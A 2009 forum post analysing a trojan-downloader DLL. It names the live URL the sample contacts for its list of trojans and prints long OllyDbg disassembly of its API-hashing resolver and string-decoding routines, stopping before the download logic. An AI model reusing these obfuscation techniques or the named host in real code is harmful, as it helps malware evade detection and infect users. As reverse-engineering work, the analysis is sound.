[Original] Analysis of a DLL downloader

Posted: 2009-7-25 17:49
Downloader DLL.
Basic information:
File name: DLL.dll
Exported function: DLL.dll->Export()
Protection: not packed, but every API address is resolved dynamically, and some calls have large amounts of junk code inserted.
Main behaviour: reads a list of download URLs from http://b2g.wo123.info/02/count.txt, downloads the trojans and runs them.
Nothing technically deep here; mistakes are unavoidable, corrections welcome.
DLLEntryPoint:
10001000 >/$ 55 push ebp
10001001 |. 8BEC mov ebp, esp
10001003 |. B8 01000000 mov eax, 1
10001008 |. 5D pop ebp
10001009 \. C2 0C00 retn 0C
1000100C CC int3
1000100D CC int3
1000100E CC int3
1000100F CC int3
10001010 >/$ 55 push ebp ; (initial cpu selection)
10001011 |. 8BEC mov ebp, esp
10001013 |. 81EC 2C010000 sub esp, 12C
10001019 |. 8D8D D8FEFFFF lea ecx, dword ptr [ebp-128]
1000101F |. E8 7C210000 call <FillApiAddress_stub>
10001024 |. 8D8D D8FEFFFF lea ecx, dword ptr [ebp-128]
1000102A |. E8 91210000 call 100031C0 ; main action call
1000102F |. C785 D4FEFFFF>mov dword ptr [ebp-12C], 0
10001039 |. 8D8D D8FEFFFF lea ecx, dword ptr [ebp-128]
1000103F |. E8 FC1F0000 call 10003040 ; cleanup: FreeLibrary and so on
10001044 |. 8B85 D4FEFFFF mov eax, dword ptr [ebp-12C]
1000104A |. 8BE5 mov esp, ebp
1000104C |. 5D pop ebp
1000104D \. C3 retn
There is no real code at DllEntryPoint (it just returns 1). The main logic lives in the exported function Export. Load the DLL in OllyDbg and change the entry point to 10001010 (Export).
1000101F |. E8 7C210000 call <FillApiAddress_stub> : resolves the addresses of all the APIs that will be used.
FillApiAddress_stub:
100031A0 >/$ 55 push ebp
100031A1 |. 8BEC mov ebp, esp
100031A3 |. 51 push ecx
100031A4 |. 894D FC mov dword ptr [ebp-4], ecx
100031A7 |. 8B4D FC mov ecx, dword ptr [ebp-4]
100031AA |. E8 D1E1FFFF call <Fill_API_Address>
100031AF |. 8B45 FC mov eax, dword ptr [ebp-4]
100031B2 |. 8BE5 mov esp, ebp
100031B4 |. 5D pop ebp
100031B5 \. C3 retn
Now look at that call -> Fill_API_Address:
10001380 >/$ 55 push ebp
10001381 |. 8BEC mov ebp, esp
10001383 |. 83EC 64 sub esp, 64
10001386 |. 894D 9C mov dword ptr [ebp-64], ecx
10001389 |. 68 324C4C09 push 94C4C32 ; hash of an API name; the pushes below work the same way
1000138E |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001391 |. E8 BAFFFFFF call <GetAPIAddressByHash>
10001396 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001399 |. 8901 mov dword ptr [ecx], eax
1000139B |. 68 96566F6A push 6A6F5696
100013A0 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
100013A3 |. E8 A8FFFFFF call <GetAPIAddressByHash>
100013A8 |. 8B55 9C mov edx, dword ptr [ebp-64]
100013AB |. 8942 04 mov dword ptr [edx+4], eax
100013AE |. 68 F3462869 push 692846F3
100013B3 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
100013B6 |. E8 95FFFFFF call <GetAPIAddressByHash>
100013BB |. 8B4D 9C mov ecx, dword ptr [ebp-64]
100013BE |. 8941 08 mov dword ptr [ecx+8], eax
100013C1 |. 68 A3D03508 push 835D0A3
100013C6 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
100013C9 |. E8 82FFFFFF call <GetAPIAddressByHash>
100013CE |. 8B55 9C mov edx, dword ptr [ebp-64]
100013D1 |. 8942 58 mov dword ptr [edx+58], eax
100013D4 |. C645 F4 00 mov byte ptr [ebp-C], 0
100013D8 |. C645 F5 26 mov byte ptr [ebp-B], 26
100013DC |. C645 F6 30 mov byte ptr [ebp-A], 30
100013E0 |. C645 F7 27 mov byte ptr [ebp-9], 27
100013E4 |. C645 F8 66 mov byte ptr [ebp-8], 66
100013E8 |. C645 F9 67 mov byte ptr [ebp-7], 67
100013EC |. C645 FA 7B mov byte ptr [ebp-6], 7B
100013F0 |. C645 FB 11 mov byte ptr [ebp-5], 11
100013F4 |. C645 FC 19 mov byte ptr [ebp-4], 19
100013F8 |. C645 FD 19 mov byte ptr [ebp-3], 19
100013FC |. C645 FE 55 mov byte ptr [ebp-2], 55
10001400 |. 6A 55 push 55
10001402 |. 6A 0B push 0B
10001404 |. 8D45 F4 lea eax, dword ptr [ebp-C]
10001407 |. 50 push eax
10001408 |. 8D4D F4 lea ecx, dword ptr [ebp-C]
1000140B |. 51 push ecx
1000140C |. 8B4D 9C mov ecx, dword ptr [ebp-64]
1000140F |. E8 3CFCFFFF call <DecodeString>
10001414 |. 8D55 F4 lea edx, dword ptr [ebp-C]
10001417 |. 52 push edx
10001418 |. 8B45 9C mov eax, dword ptr [ebp-64]
1000141B |. 8B08 mov ecx, dword ptr [eax]
1000141D |. FFD1 call ecx
1000141F |. 8B55 9C mov edx, dword ptr [ebp-64]
10001422 |. 8982 18010000 mov dword ptr [edx+118], eax
10001428 |. C645 DC 00 mov byte ptr [ebp-24], 0
1000142C |. C645 DD 3E mov byte ptr [ebp-23], 3E
10001430 |. C645 DE 39 mov byte ptr [ebp-22], 39
10001434 |. C645 DF 3E mov byte ptr [ebp-21], 3E
10001438 |. C645 E0 39 mov byte ptr [ebp-20], 39
1000143C |. C645 E1 32 mov byte ptr [ebp-1F], 32
10001440 |. C645 E2 23 mov byte ptr [ebp-1E], 23
10001444 |. C645 E3 79 mov byte ptr [ebp-1D], 79
10001448 |. C645 E4 33 mov byte ptr [ebp-1C], 33
1000144C |. C645 E5 3B mov byte ptr [ebp-1B], 3B
10001450 |. C645 E6 3B mov byte ptr [ebp-1A], 3B
10001454 |. C645 E7 57 mov byte ptr [ebp-19], 57
10001458 |. 6A 57 push 57
1000145A |. 6A 0C push 0C
1000145C |. 8D45 DC lea eax, dword ptr [ebp-24]
1000145F |. 50 push eax
10001460 |. 8D4D DC lea ecx, dword ptr [ebp-24]
10001463 |. 51 push ecx
10001464 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001467 |. E8 E4FBFFFF call <DecodeString>
1000146C |. 8D55 DC lea edx, dword ptr [ebp-24]
1000146F |. 52 push edx
10001470 |. 8B45 9C mov eax, dword ptr [ebp-64]
10001473 |. 8B08 mov ecx, dword ptr [eax]
10001475 |. FFD1 call ecx
10001477 |. 8B55 9C mov edx, dword ptr [ebp-64]
1000147A |. 8982 14010000 mov dword ptr [edx+114], eax
10001480 |. C645 CC 00 mov byte ptr [ebp-34], 0
10001484 |. C645 CD 25 mov byte ptr [ebp-33], 25
10001488 |. C645 CE 37 mov byte ptr [ebp-32], 37
1000148C |. C645 CF 20 mov byte ptr [ebp-31], 20
10001490 |. C645 D0 31 mov byte ptr [ebp-30], 31
10001494 |. C645 D1 28 mov byte ptr [ebp-2F], 28
10001498 |. C645 D2 72 mov byte ptr [ebp-2E], 72
1000149C |. C645 D3 73 mov byte ptr [ebp-2D], 73
100014A0 |. C645 D4 6F mov byte ptr [ebp-2C], 6F
100014A4 |. C645 D5 25 mov byte ptr [ebp-2B], 25
100014A8 |. C645 D6 2D mov byte ptr [ebp-2A], 2D
100014AC |. C645 D7 2D mov byte ptr [ebp-29], 2D
100014B0 |. C645 D8 41 mov byte ptr [ebp-28], 41
100014B4 |. 6A 41 push 41
100014B6 |. 6A 0D push 0D
100014B8 |. 8D45 CC lea eax, dword ptr [ebp-34]
100014BB |. 50 push eax
100014BC |. 8D4D CC lea ecx, dword ptr [ebp-34]
100014BF |. 51 push ecx
100014C0 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
100014C3 |. E8 88FBFFFF call <DecodeString>
100014C8 |. 8D55 CC lea edx, dword ptr [ebp-34]
100014CB |. 52 push edx
100014CC |. 8B45 9C mov eax, dword ptr [ebp-64]
100014CF |. 8B08 mov ecx, dword ptr [eax]
100014D1 |. FFD1 call ecx
100014D3 |. 8B55 9C mov edx, dword ptr [ebp-64]
100014D6 |. 8982 1C010000 mov dword ptr [edx+11C], eax
100014DC |. 68 7222FB14 push 14FB2272
100014E1 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
100014E4 |. E8 67FEFFFF call <GetAPIAddressByHash>
100014E9 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
100014EC |. 8941 0C mov dword ptr [ecx+C], eax
100014EF |. 68 4E5BCD68 push 68CD5B4E
100014F4 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
100014F7 |. E8 54FEFFFF call <GetAPIAddressByHash>
100014FC |. 8B55 9C mov edx, dword ptr [ebp-64]
100014FF |. 8942 10 mov dword ptr [edx+10], eax
10001502 |. 68 21DF0371 push 7103DF21
10001507 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
1000150A |. E8 41FEFFFF call <GetAPIAddressByHash>
1000150F |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001512 |. 8941 14 mov dword ptr [ecx+14], eax
10001515 |. 68 7F5E1071 push 71105E7F
1000151A |. 8B4D 9C mov ecx, dword ptr [ebp-64]
1000151D |. E8 2EFEFFFF call <GetAPIAddressByHash>
10001522 |. 8B55 9C mov edx, dword ptr [ebp-64]
10001525 |. 8942 18 mov dword ptr [edx+18], eax
10001528 |. 68 676D5640 push 40566D67
1000152D |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001530 |. E8 1BFEFFFF call <GetAPIAddressByHash>
10001535 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001538 |. 8941 40 mov dword ptr [ecx+40], eax
1000153B |. 68 81694C21 push 214C6981
10001540 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001543 |. E8 08FEFFFF call <GetAPIAddressByHash>
10001548 |. 8B55 9C mov edx, dword ptr [ebp-64]
1000154B |. 8942 30 mov dword ptr [edx+30], eax
1000154E |. 68 B790E44F push 4FE490B7
10001553 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001556 |. E8 F5FDFFFF call <GetAPIAddressByHash>
1000155B |. 8B4D 9C mov ecx, dword ptr [ebp-64]
1000155E |. 8941 24 mov dword ptr [ecx+24], eax
10001561 |. 68 13BD9F28 push 289FBD13
10001566 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001569 |. E8 E2FDFFFF call <GetAPIAddressByHash>
1000156E |. 8B55 9C mov edx, dword ptr [ebp-64]
10001571 |. 8942 2C mov dword ptr [edx+2C], eax
10001574 |. 68 A4746248 push 486274A4
10001579 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
1000157C |. E8 CFFDFFFF call <GetAPIAddressByHash>
10001581 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001584 |. 8941 34 mov dword ptr [ecx+34], eax
10001587 |. 68 38869B14 push 149B8638
1000158C |. 8B4D 9C mov ecx, dword ptr [ebp-64]
1000158F |. E8 BCFDFFFF call <GetAPIAddressByHash>
10001594 |. 8B55 9C mov edx, dword ptr [ebp-64]
10001597 |. 8942 38 mov dword ptr [edx+38], eax
1000159A |. 68 7B228232 push 3282227B
1000159F |. 8B4D 9C mov ecx, dword ptr [ebp-64]
100015A2 |. E8 A9FDFFFF call <GetAPIAddressByHash>
100015A7 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
100015AA |. 8941 3C mov dword ptr [ecx+3C], eax
100015AD |. 68 D8FB457A push 7A45FBD8
100015B2 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
100015B5 |. E8 96FDFFFF call <GetAPIAddressByHash>
100015BA |. 8B55 9C mov edx, dword ptr [ebp-64]
100015BD |. 8942 4C mov dword ptr [edx+4C], eax
100015C0 |. 68 021C0C66 push 660C1C02
100015C5 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
100015C8 |. E8 83FDFFFF call <GetAPIAddressByHash>
100015CD |. 8B4D 9C mov ecx, dword ptr [ebp-64]
100015D0 |. 8941 48 mov dword ptr [ecx+48], eax
100015D3 |. 68 843A4E26 push 264E3A84
100015D8 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
100015DB |. E8 70FDFFFF call <GetAPIAddressByHash>
100015E0 |. 8B55 9C mov edx, dword ptr [ebp-64]
100015E3 |. 8982 A0000000 mov dword ptr [edx+A0], eax
100015E9 |. 68 5110E64E push 4EE61051
100015EE |. 8B4D 9C mov ecx, dword ptr [ebp-64]
100015F1 |. E8 5AFDFFFF call <GetAPIAddressByHash>
100015F6 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
100015F9 |. 8981 9C000000 mov dword ptr [ecx+9C], eax
100015FF |. 68 5A78941B push 1B94785A
10001604 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001607 |. E8 44FDFFFF call <GetAPIAddressByHash>
1000160C |. 8B55 9C mov edx, dword ptr [ebp-64]
1000160F |. 8942 50 mov dword ptr [edx+50], eax
10001612 |. 68 7F2A1034 push 34102A7F
10001617 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
1000161A |. E8 31FDFFFF call <GetAPIAddressByHash>
1000161F |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001622 |. 8941 54 mov dword ptr [ecx+54], eax
10001625 |. C645 A0 00 mov byte ptr [ebp-60], 0
10001629 |. C645 A1 2D mov byte ptr [ebp-5F], 2D
1000162D |. C645 A2 29 mov byte ptr [ebp-5E], 29
10001631 |. C645 A3 38 mov byte ptr [ebp-5D], 38
10001635 |. C645 A4 09 mov byte ptr [ebp-5C], 9
10001639 |. C645 A5 24 mov byte ptr [ebp-5B], 24
1000163D |. C645 A6 24 mov byte ptr [ebp-5A], 24
10001641 |. C645 A7 27 mov byte ptr [ebp-59], 27
10001645 |. C645 A8 2B mov byte ptr [ebp-58], 2B
10001649 |. C645 A9 48 mov byte ptr [ebp-57], 48
1000164D |. C645 E8 00 mov byte ptr [ebp-18], 0
10001651 |. C645 E9 2D mov byte ptr [ebp-17], 2D
10001655 |. C645 EA 29 mov byte ptr [ebp-16], 29
10001659 |. C645 EB 38 mov byte ptr [ebp-15], 38
1000165D |. C645 EC 0E mov byte ptr [ebp-14], 0E
10001661 |. C645 ED 3A mov byte ptr [ebp-13], 3A
10001665 |. C645 EE 2D mov byte ptr [ebp-12], 2D
10001669 |. C645 EF 2D mov byte ptr [ebp-11], 2D
1000166D |. C645 F0 48 mov byte ptr [ebp-10], 48
10001671 |. C645 BC 00 mov byte ptr [ebp-44], 0
10001675 |. C645 BD 22 mov byte ptr [ebp-43], 22
10001679 |. C645 BE 33 mov byte ptr [ebp-42], 33
1000167D |. C645 BF 0B mov byte ptr [ebp-41], 0B
10001681 |. C645 C0 26 mov byte ptr [ebp-40], 26
10001685 |. C645 C1 34 mov byte ptr [ebp-3F], 34
10001689 |. C645 C2 33 mov byte ptr [ebp-3E], 33
1000168D |. C645 C3 02 mov byte ptr [ebp-3D], 2
10001691 |. C645 C4 35 mov byte ptr [ebp-3C], 35
10001695 |. C645 C5 35 mov byte ptr [ebp-3B], 35
10001699 |. C645 C6 28 mov byte ptr [ebp-3A], 28
1000169D |. C645 C7 35 mov byte ptr [ebp-39], 35
100016A1 |. C645 C8 47 mov byte ptr [ebp-38], 47
100016A5 |. 6A 48 push 48
100016A7 |. 6A 0A push 0A
100016A9 |. 8D55 A0 lea edx, dword ptr [ebp-60]
100016AC |. 52 push edx
100016AD |. 8D45 A0 lea eax, dword ptr [ebp-60]
100016B0 |. 50 push eax
100016B1 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
100016B4 |. E8 97F9FFFF call <DecodeString>
100016B9 |. 6A 48 push 48
100016BB |. 6A 09 push 9
100016BD |. 8D4D E8 lea ecx, dword ptr [ebp-18]
100016C0 |. 51 push ecx
100016C1 |. 8D55 E8 lea edx, dword ptr [ebp-18]
100016C4 |. 52 push edx
100016C5 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
100016C8 |. E8 83F9FFFF call <DecodeString>
100016CD |. 6A 47 push 47
100016CF |. 6A 0D push 0D
100016D1 |. 8D45 BC lea eax, dword ptr [ebp-44]
100016D4 |. 50 push eax
100016D5 |. 8D4D BC lea ecx, dword ptr [ebp-44]
100016D8 |. 51 push ecx
100016D9 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
100016DC |. E8 6FF9FFFF call <DecodeString>
100016E1 |. 8D55 A0 lea edx, dword ptr [ebp-60]
100016E4 |. 52 push edx
100016E5 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
100016E8 |. E8 03FBFFFF call <GetApiAddressByName>
100016ED |. 8B4D 9C mov ecx, dword ptr [ebp-64]
100016F0 |. 8941 20 mov dword ptr [ecx+20], eax
100016F3 |. 8D55 E8 lea edx, dword ptr [ebp-18]
100016F6 |. 52 push edx
100016F7 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
100016FA |. E8 F1FAFFFF call <GetApiAddressByName>
100016FF |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001702 |. 8941 28 mov dword ptr [ecx+28], eax
10001705 |. 8D55 BC lea edx, dword ptr [ebp-44]
10001708 |. 52 push edx
10001709 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
1000170C |. E8 DFFAFFFF call <GetApiAddressByName>
10001711 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001714 |. 8941 1C mov dword ptr [ecx+1C], eax
10001717 |. 68 B44ACE32 push 32CE4AB4
1000171C |. 8B4D 9C mov ecx, dword ptr [ebp-64]
1000171F |. E8 FCFBFFFF call 10001320
10001724 |. 8B55 9C mov edx, dword ptr [ebp-64]
10001727 |. 8942 44 mov dword ptr [edx+44], eax
1000172A |. 68 CBCC7737 push 3777CCCB
1000172F |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001732 |. E8 19FCFFFF call <GetAPIAddressByHash>
10001737 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
1000173A |. 8941 5C mov dword ptr [ecx+5C], eax
1000173D |. 68 50AC2749 push 4927AC50
10001742 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001745 |. E8 76FBFFFF call <GetAPIAddressByHash_2>
1000174A |. 8B55 9C mov edx, dword ptr [ebp-64]
1000174D |. 8942 60 mov dword ptr [edx+60], eax
10001750 |. 68 F4AD4248 push 4842ADF4
10001755 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001758 |. E8 63FBFFFF call <GetAPIAddressByHash_2>
1000175D |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001760 |. 8941 64 mov dword ptr [ecx+64], eax
10001763 |. 68 280BC820 push 20C80B28
10001768 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
1000176B |. E8 50FBFFFF call <GetAPIAddressByHash_2>
10001770 |. 8B55 9C mov edx, dword ptr [ebp-64]
10001773 |. 8942 68 mov dword ptr [edx+68], eax
10001776 |. 68 ACB3A87C push 7CA8B3AC
1000177B |. 8B4D 9C mov ecx, dword ptr [ebp-64]
1000177E |. E8 3DFBFFFF call <GetAPIAddressByHash_2>
10001783 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001786 |. 8941 6C mov dword ptr [ecx+6C], eax
10001789 |. 68 2B7BF742 push 42F77B2B
1000178E |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001791 |. E8 2AFBFFFF call <GetAPIAddressByHash_2>
10001796 |. 8B55 9C mov edx, dword ptr [ebp-64]
10001799 |. 8942 70 mov dword ptr [edx+70], eax
1000179C |. 68 28F71F71 push 711FF728
100017A1 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
100017A4 |. E8 17FBFFFF call <GetAPIAddressByHash_2>
100017A9 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
100017AC |. 8941 74 mov dword ptr [ecx+74], eax
100017AF |. 68 DE218261 push 618221DE
100017B4 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
100017B7 |. E8 04FBFFFF call <GetAPIAddressByHash_2>
100017BC |. 8B55 9C mov edx, dword ptr [ebp-64]
100017BF |. 8942 78 mov dword ptr [edx+78], eax
100017C2 |. 68 F96C390C push 0C396CF9
100017C7 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
100017CA |. E8 81FBFFFF call <GetAPIAddressByHash>
100017CF |. 8B4D 9C mov ecx, dword ptr [ebp-64]
100017D2 |. 8941 7C mov dword ptr [ecx+7C], eax
100017D5 |. 68 42352A45 push 452A3542
100017DA |. 8B4D 9C mov ecx, dword ptr [ebp-64]
100017DD |. E8 6EFBFFFF call <GetAPIAddressByHash>
100017E2 |. 8B55 9C mov edx, dword ptr [ebp-64]
100017E5 |. 8982 A4000000 mov dword ptr [edx+A4], eax
100017EB |. 68 26DD3C66 push 663CDD26
100017F0 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
100017F3 |. E8 58FBFFFF call <GetAPIAddressByHash>
100017F8 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
100017FB |. 8981 A8000000 mov dword ptr [ecx+A8], eax
10001801 |. 68 4296AE01 push 1AE9642
10001806 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001809 |. E8 42FBFFFF call <GetAPIAddressByHash>
1000180E |. 8B55 9C mov edx, dword ptr [ebp-64]
10001811 |. 8982 AC000000 mov dword ptr [edx+AC], eax
10001817 |. 68 D8C1973B push 3B97C1D8
1000181C |. 8B4D 9C mov ecx, dword ptr [ebp-64]
1000181F |. E8 2CFBFFFF call <GetAPIAddressByHash>
10001824 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001827 |. 8981 B0000000 mov dword ptr [ecx+B0], eax
1000182D |. 68 43081E4E push 4E1E0843
10001832 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001835 |. E8 16FBFFFF call <GetAPIAddressByHash>
1000183A |. 8B55 9C mov edx, dword ptr [ebp-64]
1000183D |. 8982 80000000 mov dword ptr [edx+80], eax
10001843 |. 68 28FBEB70 push 70EBFB28
10001848 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
1000184B |. E8 00FBFFFF call <GetAPIAddressByHash>
10001850 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001853 |. 8981 84000000 mov dword ptr [ecx+84], eax
10001859 |. 68 27A66374 push 7463A627
1000185E |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001861 |. E8 EAFAFFFF call <GetAPIAddressByHash>
10001866 |. 8B55 9C mov edx, dword ptr [ebp-64]
10001869 |. 8982 88000000 mov dword ptr [edx+88], eax
1000186F |. 68 10DB0433 push 3304DB10
10001874 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001877 |. E8 D4FAFFFF call <GetAPIAddressByHash>
1000187C |. 8B4D 9C mov ecx, dword ptr [ebp-64]
1000187F |. 8981 8C000000 mov dword ptr [ecx+8C], eax
10001885 |. 68 04B5FE3A push 3AFEB504
1000188A |. 8B4D 9C mov ecx, dword ptr [ebp-64]
1000188D |. E8 BEFAFFFF call <GetAPIAddressByHash>
10001892 |. 8B55 9C mov edx, dword ptr [ebp-64]
10001895 |. 8982 94000000 mov dword ptr [edx+94], eax
1000189B |. 68 78684D20 push 204D6878
100018A0 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
100018A3 |. E8 A8FAFFFF call <GetAPIAddressByHash>
100018A8 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
100018AB |. 8981 98000000 mov dword ptr [ecx+98], eax
100018B1 |. 68 A1360E45 push 450E36A1
100018B6 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
100018B9 |. E8 92FAFFFF call <GetAPIAddressByHash>
100018BE |. 8B55 9C mov edx, dword ptr [ebp-64]
100018C1 |. 8982 90000000 mov dword ptr [edx+90], eax
100018C7 |. 68 C0058F0B push 0B8F05C0
100018CC |. 8B4D 9C mov ecx, dword ptr [ebp-64]
100018CF |. E8 1CFAFFFF call <GetAPIAddressByHash_2>
100018D4 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
100018D7 |. 8981 B4000000 mov dword ptr [ecx+B4], eax
100018DD |. 68 07166015 push 15601607
100018E2 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
100018E5 |. E8 06FAFFFF call <GetAPIAddressByHash_2>
100018EA |. 8B55 9C mov edx, dword ptr [ebp-64]
100018ED |. 8982 B8000000 mov dword ptr [edx+B8], eax
100018F3 |. 68 2DAF9C4E push 4E9CAF2D
100018F8 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
100018FB |. E8 F0F9FFFF call <GetAPIAddressByHash_2>
10001900 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001903 |. 8981 BC000000 mov dword ptr [ecx+BC], eax
10001909 |. 68 01144601 push 1461401
1000190E |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001911 |. E8 DAF9FFFF call <GetAPIAddressByHash_2>
10001916 |. 8B55 9C mov edx, dword ptr [ebp-64]
10001919 |. 8982 04010000 mov dword ptr [edx+104], eax
1000191F |. 68 2EBBE374 push 74E3BB2E
10001924 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001927 |. E8 24FAFFFF call <GetAPIAddressByHash>
1000192C |. 8B4D 9C mov ecx, dword ptr [ebp-64]
1000192F |. 8981 C0000000 mov dword ptr [ecx+C0], eax
10001935 |. 68 10CA4937 push 3749CA10
1000193A |. 8B4D 9C mov ecx, dword ptr [ebp-64]
1000193D |. E8 0EFAFFFF call <GetAPIAddressByHash>
10001942 |. 8B55 9C mov edx, dword ptr [ebp-64]
10001945 |. 8982 C4000000 mov dword ptr [edx+C4], eax
1000194B |. 68 B73CF449 push 49F43CB7
10001950 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001953 |. E8 F8F9FFFF call <GetAPIAddressByHash>
10001958 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
1000195B |. 8981 C8000000 mov dword ptr [ecx+C8], eax
10001961 |. 68 EE4A7F2C push 2C7F4AEE
10001966 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001969 |. E8 E2F9FFFF call <GetAPIAddressByHash>
1000196E |. 8B55 9C mov edx, dword ptr [ebp-64]
10001971 |. 8982 CC000000 mov dword ptr [edx+CC], eax
10001977 |. 68 4DD72863 push 6328D74D
1000197C |. 8B4D 9C mov ecx, dword ptr [ebp-64]
1000197F |. E8 CCF9FFFF call <GetAPIAddressByHash>
10001984 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001987 |. 8981 D0000000 mov dword ptr [ecx+D0], eax
1000198D |. 68 9FD49516 push 1695D49F
10001992 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001995 |. E8 B6F9FFFF call <GetAPIAddressByHash>
1000199A |. 8B55 9C mov edx, dword ptr [ebp-64]
1000199D |. 8982 D8000000 mov dword ptr [edx+D8], eax
100019A3 |. 68 9AC2BE2A push 2ABEC29A
100019A8 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
100019AB |. E8 A0F9FFFF call <GetAPIAddressByHash>
100019B0 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
100019B3 |. 8981 DC000000 mov dword ptr [ecx+DC], eax
100019B9 |. C645 AC 00 mov byte ptr [ebp-54], 0
100019BD |. C645 AD 3F mov byte ptr [ebp-53], 3F
100019C1 |. C645 AE 24 mov byte ptr [ebp-52], 24
100019C5 |. C645 AF 22 mov byte ptr [ebp-51], 22
100019C9 |. C645 B0 23 mov byte ptr [ebp-50], 23
100019CD |. C645 B1 37 mov byte ptr [ebp-4F], 37
100019D1 |. C645 B2 3A mov byte ptr [ebp-4E], 3A
100019D5 |. C645 B3 17 mov byte ptr [ebp-4D], 17
100019D9 |. C645 B4 3A mov byte ptr [ebp-4C], 3A
100019DD |. C645 B5 3A mov byte ptr [ebp-4B], 3A
100019E1 |. C645 B6 39 mov byte ptr [ebp-4A], 39
100019E5 |. C645 B7 35 mov byte ptr [ebp-49], 35
100019E9 |. C645 B8 13 mov byte ptr [ebp-48], 13
100019ED |. C645 B9 2E mov byte ptr [ebp-47], 2E
100019F1 |. C645 BA 56 mov byte ptr [ebp-46], 56
100019F5 |. 6A 56 push 56
100019F7 |. 6A 0F push 0F
100019F9 |. 8D55 AC lea edx, dword ptr [ebp-54]
100019FC |. 52 push edx
100019FD |. 8D45 AC lea eax, dword ptr [ebp-54]
10001A00 |. 50 push eax
10001A01 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001A04 |. E8 47F6FFFF call <DecodeString>
10001A09 |. 8D4D AC lea ecx, dword ptr [ebp-54]
10001A0C |. 51 push ecx
10001A0D |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001A10 |. E8 DBF7FFFF call <GetApiAddressByName>
10001A15 |. 8B55 9C mov edx, dword ptr [ebp-64]
10001A18 |. 8982 D4000000 mov dword ptr [edx+D4], eax
10001A1E |. 68 C021115F push 5F1121C0
10001A23 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001A26 |. E8 25F9FFFF call <GetAPIAddressByHash>
10001A2B |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001A2E |. 8981 E0000000 mov dword ptr [ecx+E0], eax
10001A34 |. 68 62B2F477 push 77F4B262
10001A39 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001A3C |. E8 0FF9FFFF call <GetAPIAddressByHash>
10001A41 |. 8B55 9C mov edx, dword ptr [ebp-64]
10001A44 |. 8982 E4000000 mov dword ptr [edx+E4], eax
10001A4A |. 68 7BB7AA51 push 51AAB77B
10001A4F |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001A52 |. E8 F9F8FFFF call <GetAPIAddressByHash>
10001A57 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001A5A |. 8981 E8000000 mov dword ptr [ecx+E8], eax
10001A60 |. 68 962F901C push 1C902F96
10001A65 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001A68 |. E8 E3F8FFFF call <GetAPIAddressByHash>
